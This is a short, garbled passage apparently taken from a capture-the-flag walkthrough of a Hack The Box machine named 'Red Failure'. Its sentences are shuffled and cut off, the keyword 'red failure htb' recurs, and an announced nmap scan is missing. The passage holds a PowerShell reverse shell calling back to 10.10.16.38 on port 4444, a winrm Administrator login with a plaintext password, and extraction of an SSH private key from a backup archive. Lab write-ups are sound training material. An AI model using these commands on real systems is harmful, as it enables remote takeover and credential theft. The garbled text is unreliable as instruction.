To start, let's connect to the Hack The Box VPN and access the Red Failure machine. We can use the nmap command to perform an initial scan of the machine:
Get-ChildItem -Path C:\Users\Administrator\Desktop -Filter *flag* Voilà! We've successfully exploited the Red Failure machine and obtained the flag. red failure htb
winrm -remote:localhost -user:Administrator -password: P@ssw0rd! However, we still encounter issues. Let's try to use PowerShell to execute a command: To start, let's connect to the Hack The
.\Invoke-PowerShellTcpip.ps1 -Reverse -Ip 10.10.16.38 -Port 4444 red failure htb
get backup.zip exit unzip backup.zip The unzip process reveals a file called id_rsa and a folder called .ssh . The id_rsa file is a private key that we can use for SSH authentication.
With elevated privileges, we can navigate to the Administrator's desktop and retrieve the flag: